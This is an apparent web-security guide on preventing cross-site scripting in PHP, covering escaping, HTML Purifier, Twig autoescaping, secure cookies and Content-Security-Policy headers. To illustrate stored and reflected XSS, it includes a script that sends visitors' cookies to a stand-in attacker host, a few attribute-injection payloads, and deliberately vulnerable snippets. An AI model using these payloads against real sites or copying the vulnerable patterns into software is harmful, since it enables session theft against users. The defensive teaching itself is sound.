Cross-Site Scripting (abbreviated as XSS) is a class
of security vulnerability whereby an attacker manages to use a website
to deliver a potentially malicious JavaScript payload to an end user.
XSS vulnerabilities are
very common in web applications.
They're a special case of code injection attack; except where SQL
injection, local/remote file inclusion, and OS command injection target
the server, XSS exclusively targets the users of a website.
There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:
-
Stored XSS occurs when data you submit to a website is
persisted (on disk or in RAM) across requests, usually with the goal of
executing when a privileged user access a particular web page.
-
Reflective XSS occurs when a particular page can be
used to execute arbitrary code, but it does not persist the attack code
across multiple requests. Since an attacker needs to send a user to a
specially crafted URL for the code to run, reflective XSS usually
requires some social engineering to pull off.
Cross-Site Scripting vulnerabilities can be used by an attacker to
accomplish a long list of potential nefarious goals, including:
- Steal your session identifier so they can impersonate you and access the web application.
- Redirect you to a phishing page that gathers sensitive information.
- Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).
- Perform tasks on your behalf (i.e. create a new administrator account with the attacker's credentials).
Cross-Site Scripting represents an asymmetric in the security
landscape. They're incredibly easy for attackers to exploit, but XSS
mitigation can become a rabbit hole of complexity depending on your
project's requirements.
Brief XSS Mitigation Guide
- If your framework has a templating engine that offers automatic contextual filtering, use that.
-
echo htmlspecialchars($string, ENT_QUOTES | ENT_HTML5, 'UTF-8');
is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML.
- If your requirements allow you to use Markdown instead of HTML, don't use HTML.
- If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier.
The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.
What Does a XSS Vulnerability Look Like?
XSS vulnerabilities can occur in any place where information which
can be altered by any user is included in the output of a webpage
without being properly escaped.
Example 1
<div id="profile"><?php echo $user['profile']; ?></div>
This is a potential
stored XSS infection point (assuming the
profile
field was pulled straight from the database without escaping). If the
malicious user is able to include a snippet that looks like this, they
can exploit any authenticated user that visits their profile and steal
their cookies for future impersonation efforts:
<script>
window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank");
</script>
Example 2
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
The above snippet is vulnerable to
reflective XSS attacks. Just trick a user into visiting
/form.php?%22%20onload%3D%22alert(%27XSS%27)%3B
and they will see an alert box pop up containing the message 'XSS' when your page loads.
<form action="/form.php?" onload="alert('XSS');" method="post">
Unlike
SQL Injection,
which prepared statements defeat 100% of the time, cross-site scripting
doesn't have an industry standard strategy for separating data from
instructions. You have to escape special characters to prevent attacks.
The Quick and Dirty XSS Mitigation Technique for PHP Applications
The simplest and most effective way to prevent XSS attacks is the nuclear option:
Ruthlessly escape any character that can affect the structure of your document.
For best results, you want to use the built-in
htmlspecialchars()
function that PHP offers instead of playing with string escaping yourself.
<?php
function noHTML($input, $encoding = 'UTF-8')
{
return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, $encoding);
}
echo '<h2 title="', noHTML($title), '">', $articleTitle, '</h2>', "\n";
echo noHTML($some_data), "\n";
The security of this construction depends on the presence of the
ENT_QUOTES
flag when to escape HTML attribute values. It's important to note that this prevents
any HTML characters in
$some_data
from displaying on the web page.
Why ENT_QUOTES | ENT_HTML5
and 'UTF-8'
?
We specify
ENT_QUOTES
to tell
htmlspecialchars()
to escape quote characters (
"
and
'
). This is helpful for situations such as:
<input type="text" name="field" value="<?php echo $escaped_value; ?>" />
If you failed to specify
ENT_QUOTES
and attacker simply needs to pass
" onload="malicious javascript code
as a value to that form field and presto, instant client-side code execution.
We specify
ENT_HTML5
and
'UTF-8'
so
htmlspecialchars()
knows what character set and version of the HTML standard to work with.
The reason we need to specify both values is, as
demonstrated against mysql_real_escape_string()
, an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.
For the sake of safety and consistency, the encoding we specify here, the encoding sent in the
charset
attribute of the
<meta>
tag, and the
charset
added to the
Content-Type
HTTP header should all match.
Important - Avoid Premature Optimization
Always escape data on output (when displaying to a user).
Do not escape user input against XSS attacks before inserting into a
database. WordPress made this mistake and eventually security researcher
Jouko Pynnönen of Klikki Oy realized
MySQL column truncation can defeat before-insert XSS prevention strategies.
You should still be
validating your input, however. If you're expecting an email address, make sure it's formatted like one.
$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
}
If you're using MySQL, make sure any values going into a
TEXT
field will fit in less than 64 KiB. MySQL will truncate
TEXT
fields if any value exceeds that length, which can cause both security
issues (as WordPress experienced) as well as data integrity issues.
The "escape all HTML entities" approach is secure and works
wonderfully for situations where users should not be providing their own
HTML markup. But what if you need to allow
some markup, while not opening the door for
any markup?
Put another way: How can we allow users to provide their own rich
text markup without allowing them to execute arbitrary JavaScript in
visitors' browsers?
Avoid HTML If You Can
An attractive solution is to adopt a rendering format such as BBCode,
Markdown, or ReStructuredText instead of allowing raw HTML. This allows
us to continue to reject all HTML entities while still allowing a
limited subset markup options to make a user's contributions more
expressive and powerful.
If you can avoid accepting raw HTML by using another markup language such as Markdown,
please do so. If you can bolt a
WYSIWYG onto it for non-technical users, even better.
An Order of HTML Please, Hold the XSS Payload
Although we can easily stop all XSS attacks by preventing any HTML
markup characters from breaking the document structure, this is often
not the desired outcome. For some use cases (blog comments, user
profiles, etc.) we want to allow our end users to be free to express
themselves, within reason. But at the same time, we don't want users to
be able to abuse this potential for customization to attack other users.
How can we resolve this conflict? Simple: Use a library such as
HTML Purifier. Most of the
clever XSS tricks hidden in the HTML specification are easily
defeated by HTMLPurifier, if used correctly.
How to Use HTMLPurifier to Stop XSS Attacks
Instead of attempting to naively search and replace malicious
snippets in a string of user input, HTML Purifier digests the entire
string as an HTML document, breaks it into tokens, and validates all
elements and attributes against a whitelist and the RFC definitions for
each attribute.
<?php
require_once '/path/to/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$htmlp = new HTMLPurifier($config);
?>
<div id="profile"><?php
echo $htmlp->purify($user['profile']);
?></div>
Optimizing HTMLPurifier
Running HTML Purifier on every page load is a performance concern
that can be easily fixed by caching. When you insert data into your
database, keep the original values intact (e.g. for logging and threat
intelligence purposes), but also store a purified version and use the
purified HTML when displaying to end users.
This "store, purify, cache, serve from cache" strategy allows you to
enjoy the performance benefits developers normally get from filtering on
input, but without causing a permanent loss of data. It also allows you
to re-purify your original values in the event that you need to (e.g.
if HTML Purifier has a bug with HTML5 output and they release a new
version that fixes it).
$db->insert('blog_comments', [
'original_body' => $_POST['body'],
'rendered_body' => $htmlp->purify($_POST['body'])
]);
Important: When Not to Use HTML Purifier
HTML Purifier expects to operate in the context of an HTML document,
not a string within an HTML attribute. The library isn't psychic. It
cannot tell what the rest of the web page is doing immediately before
and after the string you invoke it on an untrusted string.
For example, even though it's using HTML Purifier, the following snippet is still
insecure:
<img src="user.php?username=<?php echo $htmlp->purify($_GET['username']); ?>" />
Simply pass the string
" onload="alert('XSS');
to
username
and you have client-side code execution.
When inserting any variables into another context, you should also run them through
htmlspecialchars()
(or
noHTML()
above) to ensure they don't break out and add extra attributes to the parent element.
This is safe:
<img src="user.php?username=<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />
This, too, is safe:
<?php echo $htmlp->purify("<img src=\"user.php?username=".$_GET['username']."\" />"); ?>
As it turns out,
context matters a lot for preventing cross-site scripting attacks.
What's secure in one context (e.g. HTML is allowed) could be disastrous
in other contexts (e.g. we're in the middle of an HTML attribute).
What About Other Contexts?
We've uncovered two rules for preventing XSS attacks so far:
- Always escape all HTML entities (i.e. with
noHTML()
defined above) when inserting data to an HTML attribute.
- Always purify (i.e. with HTML Purifier) when you wish to allow safe
HTML from the input string to appear in the rendered web page.
What do we do if we want to add a user-provided parameter to a
style
tag or attribute? What if we want to define a default value to a JavaScript variable?
Context-Sensitive HTML Escaping in Template Engines
Every context within an HTML document requires distinct escaping
rules that are not always relevant to other contexts. Fortunately,
there's an easy way to tackle all this complexity without a great deal
of effort or research:
Use templating libraries.
A popular PHP templating engine,
Twig, makes
contextual XSS filtering a walk in the park:
{% autoescape 'css' %}
<p style="color: {{ color|default('#0f0') }};">Test</p>
{% endautoescape %}
{% autoescape 'html' %}
{{ some_var }}
{{ not_user_provided|raw }}
<p class="{{ class|e('html_attr') }}">
<a href="/user/{{ username|e('url') }}">{{ username }}</a>
</p>
{% endautoescape %}
If you're using Twig, you should prefer wrapping entire sections in
{% autoescape %}
blocks above applying
|e
filters to every printed template variable. Not only does auto-escaping
make your code easier to read, but it prevents a single oversight from
becoming an entry point for an attacker with a malicious payload.
Browser-Level XSS Mitigation
There are a number of security features supported by all modern web
browsers that significantly reduce the impact of XSS vulnerabilities.
Even if you manage to escape every variable you output, it would be a
very good idea to use these features. We are going to focus on two:
HTTPS-Only Cookies (which means HTTP-Only cookies which only transmit over TLS) and
Content-Security-Policy headers.
Secure Cookies
Any time you
set a cookie in PHP, you should set both
httpOnly
and
secure
to
true
. (This assumes your website is only accessible over HTTPS, which it should be.)
Your session cookie should, especially, not be made available to
Javascript. This can be achieved either through adding these lines to
php.ini
, or by setting them manually on every request:
session.cookie_httponly = On
session.cookie_secure = On
Setting the session cookie parameters on every page load:
session_set_cookie_params(
0,
'/',
'.yourdomain.com',
true,
true
);
session_start();
Content-Security-Policy headers
Content-Security-Policy
headers significantly reduce the
risk and impact of XSS attacks in modern browsers by specifying a
whitelist in the HTTP response headers which dictate what the HTTP
response body can do. They don't protect against an attacker capable of
modifying the source files on the server, but most real-world XSS
vulnerabilities will fail to execute if they are used properly.
An example of a CSP header looks like this:
Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests
HTML5 Rocks has a great
introductory tutorial for Content-Security-Policy headers if you would like to learn more about writing them.
Paragon Initiative Enterprise's CSP Compiler
Ever wanted to make
Content-Security-Policy
headers
easier to manage? Whether you'd rather just edit a JSON file than
remember the syntax of a CSP header, or if you'd rather build the
headers for a particular request programmatically (e.g. to use the
script-nonce feature), check out our MIT-licensed
CSP Builder project.
Summary
- Use
Content-Security-Policy
headers and HTTPS-only cookies.
- Your first line of defense against XSS attacks should be filtering any tainted information before inserting them in the DOM not before storing it in a database.
- If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML.
- If you're using a templating engine such as Twig, use
{% autoescape %}
directives and |e
filters where appropriate. {% autoescape %}
should be prioritized over escaping every variable.
- If you're not using a templating engine and need to safely render user-provided HTML, use HTML Purifier. Feel free to leverage caching for optimization, but keep an intact copy on-hand.
- Otherwise, use
noHTML()
and leave nothing to chance.